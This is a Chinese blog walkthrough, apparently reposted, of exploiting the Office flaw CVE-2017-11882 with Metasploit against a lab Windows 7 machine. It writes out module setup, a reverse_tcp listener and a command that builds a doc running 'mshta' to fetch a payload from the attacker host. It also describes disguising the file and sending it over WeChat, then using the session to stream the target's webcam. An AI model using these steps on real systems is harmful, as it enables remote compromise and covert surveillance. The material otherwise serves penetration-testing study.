MSF渗透测试-CVE-2017-11882(MSOffice漏洞)

1.测试环境

2.测试前准备

3.测试过程

—3.1虚拟机环境测试

—3.2局域网靶机测试

4.测试感想

1.测试环境

攻击机:

OS:kail

IP:192.168.15.132/192.168.137.231

靶机:

OS:Windows7

Office版本:Office2013_CN

IP:

2.测试前准备

1.下载python脚本

906866-20180418195136703-1413818369.png

2.下载MSF组件

906866-20180418195155341-1444484916.png

3.将cve_2017_11882.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下

906866-20180418195344287-282036989.png

4.把下载的cve_2017_11882.rtf复制到/usr/share/metasploit-framework/data/exploits/目录下

906866-20180418195457585-332311039.png

5.把Command109b_CVE-2017-11882.py复制到/root目录下

3.测试过程

3.1虚拟机环境测试

1.msfconsole执行search命令

906866-20180418195554092-744261512.png

2.设置payloadreverse_tcp,设置LHOST192.168.15.132,设置URIPATHtest(之后利用python脚本生成doc文件的时候也要使用相同路径)

906866-20180418200017020-1633142142.png

3.show options显示设置

906866-20180418200146990-1274015817.png

4.exploit -j运行

906866-20180418201549793-1620425608.png

5.另开一个terminalpython Command109b_CVE-2017-11882.py -c "mshta http://192.168.15.132:8080/test" -o kail_help.doc

906866-20180418201809382-796805619.png

6.把生成的kail_help复制到靶机中打开,是个空白文档

906866-20180418201851223-1915721984.png

7.回连成功906866-20180418201941717-1587377517.png

8.sessions -i 1接管活动会话1,shell可以看到已经成功渗透靶机

906866-20180418202017175-1220811134.png

3.2局域网靶机测试

0.更改kail网络链接模式由NAT->桥接,获得一个与靶机在同一网段下的IP192.168.137.231

1.更改一下LHOST,重新生成一个doc文件,exploit -j监听

906866-20180418202541607-1336925692.png

2.将文件改名为kail_help2.doc通过微信发给靶机(随便改啥,具有迷惑性就行)

3.靶机打开doc,Windows7防火墙处于打开状态,无杀软

906866-20180418202724905-628194459.png

4.攻击机获得回连,sessions -i 1接管

906866-20180418202750505-1563530435.png

5.webcam_stream可以直接控制摄像头进行直播

906866-20180418202858748-496139362.png

6.shell中获取靶机桌面信息

906866-20180418202937482-2134783496.png

4.测试感想

  • 前人栽树,后人乘凉。githubmeterpreter-db上有漏洞相关的msf模块python脚本可以直接使用
  • 老旧系统、软件十分不靠谱,易于攻入。其实还实践了WindowsDefender+Windows10的组合,WinodowsDefender会直接将doc文件杀掉,但是这个版本的WIN7还是应用很广的,包括Office2013可以说是学生中应用十分广泛的版本(这个Windwos镜像和office2013都是徐日老师FTP服务器上的版本,在DKY安装率应该还是很有保证的)

转载于:https://www.cnblogs.com/zl20154312/p/8877386.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值